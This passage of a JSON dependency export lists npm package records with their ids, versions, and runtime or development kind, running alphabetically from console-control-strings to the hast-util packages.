rect":false,"kind":"runtime","optional":false},{"id":13870349754,"package_name":"console-control-strings@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349755,"package_name":"constant-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349756,"package_name":"constantinople@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349757,"package_name":"convert-gitmoji@0.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349758,"package_name":"convert-source-map@1.9.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349759,"package_name":"convert-source-map@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349760,"package_name":"cookie-es@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349761,"package_name":"core-util-is@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349762,"package_name":"cosmiconfig@7.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349763,"package_name":"cosmiconfig@8.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349764,"package_name":"crc-32@1.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349765,"package_name":"crc32-stream@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349766,"package_name":"create-require@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349767,"package_name":"cross-spawn@7.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349768,"package_name":"css-declaration-sorter@6.4.1(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349769,"package_name":"css-loader@6.8.1(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349770,"package_name":"css-minimizer-webpack-plugin@5.0.1(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349771,"package_name":"css-select@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349772,"package_name":"css-tree@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349773,"package_name":"css-tree@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349774,"package_name":"css-what@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349775,"package_name":"css.escape@1.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349776,"package_name":"cssesc@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349777,"package_name":"cssnano-preset-default@6.0.1(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349778,"package_name":"cssnano-utils@4.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349779,"package_name":"cssnano@6.0.1(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349780,"package_name":"csso@5.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349781,"package_name":"csstype@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349782,"package_name":"cuint@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349783,"package_name":"data-uri-to-buffer@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349784,"package_name":"de-indent@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349785,"package_name":"debug@2.6.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349786,"package_name":"debug@3.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349787,"package_name":"debug@4.3.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349788,"package_name":"decode-named-character-reference@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349789,"package_name":"deep-eql@4.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349790,"package_name":"deep-extend@0.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349791,"package_name":"deep-is@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349792,"package_name":"deepmerge@4.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349793,"package_name":"default-browser-id@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349794,"package_name":"default-browser@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349795,"package_name":"define-lazy-prop@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349796,"package_name":"define-lazy-prop@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349797,"package_name":"define-properties@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349798,"package_name":"defu@6.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349799,"package_name":"delegates@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349800,"package_name":"denque@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349801,"package_name":"depd@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349802,"package_name":"dequal@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349803,"package_name":"destr@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349804,"package_name":"destroy@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349805,"package_name":"detab@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349806,"package_name":"detect-libc@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349807,"package_name":"detect-libc@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349808,"package_name":"devalue@4.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349809,"package_name":"diff-sequences@29.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349810,"package_name":"diff@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349811,"package_name":"dir-glob@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349812,"package_name":"doctrine@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349813,"package_name":"doctrine@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349814,"package_name":"doctypes@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349815,"package_name":"dom-serializer@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349816,"package_name":"domelementtype@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349817,"package_name":"domhandler@5.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349818,"package_name":"domutils@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349819,"package_name":"dot-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349820,"package_name":"dot-prop@8.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349821,"package_name":"dotenv@16.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349822,"package_name":"duplexer@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349823,"package_name":"eastasianwidth@0.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349824,"package_name":"editorconfig@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349825,"package_name":"ee-first@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349826,"package_name":"electron-to-chromium@1.4.485","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349832,"package_name":"emoji-regex@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349833,"package_name":"emoji-regex@9.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349834,"package_name":"emojis-list@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349835,"package_name":"emoticon@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349837,"package_name":"encodeurl@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349838,"package_name":"engine.io-client@6.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349839,"package_name":"engine.io-parser@5.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349840,"package_name":"enhanced-resolve@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349841,"package_name":"enhanced-resolve@5.15.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349842,"package_name":"entities@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349843,"package_name":"entities@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349844,"package_name":"errno@0.1.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349845,"package_name":"error-ex@1.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349846,"package_name":"error-stack-parser@2.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349847,"package_name":"es-abstract@1.22.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349848,"package_name":"es-module-lexer@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349849,"package_name":"es-set-tostringtag@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349850,"package_name":"es-shim-unscopables@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349851,"package_name":"es-to-primitive@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349852,"package_name":"es6-object-assign@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349853,"package_name":"esbuild-loader@4.0.2(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349854,"package_name":"esbuild@0.17.19","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349855,"package_name":"esbuild@0.18.20","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349856,"package_name":"esbuild@0.19.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349857,"package_name":"escalade@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349858,"package_name":"escape-html@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349859,"package_name":"escape-string-regexp@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349901,"package_name":"escape-string-regexp@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349902,"package_name":"escape-string-regexp@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349903,"package_name":"escape-string-regexp@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349904,"package_name":"eslint-config-standard@17.1.0(eslint-plugin-import@2.28.1)(eslint-plugin-n@15.7.0)(eslint-plugin-promise@6.1.1)(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349905,"package_name":"eslint-import-resolver-node@0.3.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349906,"package_name":"eslint-import-resolver-typescript@3.6.0(@typescript-eslint","ecosystem":"npm","requirements":"parser@6.6.0)(eslint-plugin-import@2.28.1)(eslint@8.49.0)","direct":false,"kind":"development","optional":false},{"id":13870349907,"package_name":"eslint-module-utils@2.8.0(@typescript-eslint","ecosystem":"npm","requirements":"parser@6.6.0)(eslint-import-resolver-node@0.3.8)(eslint-import-resolver-typescript@3.6.0)(eslint@8.49.0)","direct":false,"kind":"development","optional":false},{"id":13870349908,"package_name":"eslint-plugin-es@3.0.1(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349909,"package_name":"eslint-plugin-es@4.1.0(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349910,"package_name":"eslint-plugin-import@2.28.1(@typescript-eslint","ecosystem":"npm","requirements":"parser@6.6.0)(eslint-import-resolver-typescript@3.6.0)(eslint@8.49.0)","direct":false,"kind":"development","optional":false},{"id":13870349911,"package_name":"eslint-plugin-jsdoc@41.1.2(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349912,"package_name":"eslint-plugin-n@15.7.0(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349913,"package_name":"eslint-plugin-no-only-tests@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349914,"package_name":"eslint-plugin-node@11.1.0(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349915,"package_name":"eslint-plugin-promise@6.1.1(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349916,"package_name":"eslint-plugin-unicorn@44.0.2(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349944,"package_name":"eslint-plugin-vue@9.17.0(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349947,"package_name":"eslint-scope@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349950,"package_name":"eslint-scope@7.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349952,"package_name":"eslint-utils@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349955,"package_name":"eslint-utils@3.0.0(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349957,"package_name":"eslint-visitor-keys@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349960,"package_name":"eslint-visitor-keys@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349962,"package_name":"eslint-visitor-keys@3.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349964,"package_name":"eslint@8.49.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349966,"package_name":"espree@9.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349968,"package_name":"esprima@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349970,"package_name":"esquery@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349972,"package_name":"esrecurse@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349974,"package_name":"estraverse@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349976,"package_name":"estraverse@5.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349978,"package_name":"estree-walker@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349981,"package_name":"estree-walker@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349984,"package_name":"esutils@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349986,"package_name":"etag@1.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349988,"package_name":"events@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349990,"package_name":"execa@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349992,"package_name":"execa@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349994,"package_name":"execa@8.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870349996,"package_name":"expect@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870349999,"package_name":"extend@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350001,"package_name":"externality@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350004,"package_name":"fast-deep-equal@3.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350006,"package_name":"fast-diff@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350008,"package_name":"fast-fifo@1.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350010,"package_name":"fast-glob@3.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350012,"package_name":"fast-json-stable-stringify@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350014,"package_name":"fast-levenshtein@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350016,"package_name":"fastq@1.15.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350018,"package_name":"fb-watchman@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350020,"package_name":"fetch-blob@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350022,"package_name":"fflate@0.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350208,"package_name":"file-entry-cache@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350210,"package_name":"file-loader@6.2.0(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350213,"package_name":"file-uri-to-path@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350216,"package_name":"fill-range@7.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350218,"package_name":"find-up@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350220,"package_name":"find-up@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350222,"package_name":"flat-cache@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350225,"package_name":"flat@5.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350227,"package_name":"flatted@3.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350230,"package_name":"focus-trap@7.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350232,"package_name":"for-each@0.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350235,"package_name":"foreground-child@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350237,"package_name":"fork-ts-checker-webpack-plugin@8.0.0(typescript@5.2.2)(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350240,"package_name":"formdata-polyfill@4.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350243,"package_name":"fraction.js@4.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350245,"package_name":"fresh@0.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350247,"package_name":"fs-extra@10.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350249,"package_name":"fs-extra@11.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350250,"package_name":"fs-minipass@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350251,"package_name":"fs-monkey@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350252,"package_name":"fs.realpath@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350253,"package_name":"fsevents@2.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350254,"package_name":"function-bind@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350255,"package_name":"function.prototype.name@1.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350256,"package_name":"functions-have-names@1.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350257,"package_name":"fuse.js@6.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350258,"package_name":"gauge@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350259,"package_name":"gensync@1.0.0-beta.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350260,"package_name":"get-caller-file@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350261,"package_name":"get-func-name@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350262,"package_name":"get-intrinsic@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350263,"package_name":"get-package-type@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350264,"package_name":"get-port-please@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350265,"package_name":"get-stdin@9.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350266,"package_name":"get-stream@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350267,"package_name":"get-stream@8.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350268,"package_name":"get-symbol-description@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350269,"package_name":"get-tsconfig@4.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350270,"package_name":"giget@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350271,"package_name":"git-config-path@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350272,"package_name":"git-up@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350273,"package_name":"git-url-parse@13.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350274,"package_name":"github-slugger@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350275,"package_name":"glob-parent@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350276,"package_name":"glob-parent@6.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350277,"package_name":"glob-to-regexp@0.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350278,"package_name":"glob@10.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350279,"package_name":"glob@7.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350280,"package_name":"glob@8.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350368,"package_name":"glob@8.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350369,"package_name":"globals@11.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350370,"package_name":"globals@13.20.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350371,"package_name":"globalthis@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350372,"package_name":"globby@11.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350373,"package_name":"globby@13.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350374,"package_name":"gopd@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350375,"package_name":"graceful-fs@4.2.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350376,"package_name":"graphemer@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350377,"package_name":"gzip-size@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350378,"package_name":"gzip-size@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350379,"package_name":"h3@1.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350380,"package_name":"happy-dom@12.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350381,"package_name":"has-bigints@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350382,"package_name":"has-flag@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350383,"package_name":"has-flag@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350384,"package_name":"has-property-descriptors@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350385,"package_name":"has-proto@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350386,"package_name":"has-symbols@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350387,"package_name":"has-tostringtag@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350388,"package_name":"has-unicode@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350389,"package_name":"has@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350390,"package_name":"hash-sum@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350391,"package_name":"hast-util-from-parse5@7.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350392,"package_name":"hast-util-has-property@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350393,"package_name":"hast-util-heading-rank@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350394,"package_name":"hast-util-is-element@2.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350395,"package_name":"hast-util-parse-selector@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350396,"package_name":"hast-util-raw@7.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350397,"package_name":"hast-util-to-parse5@7.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350398,"package_name":"hast-util-to-string@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350399,"pack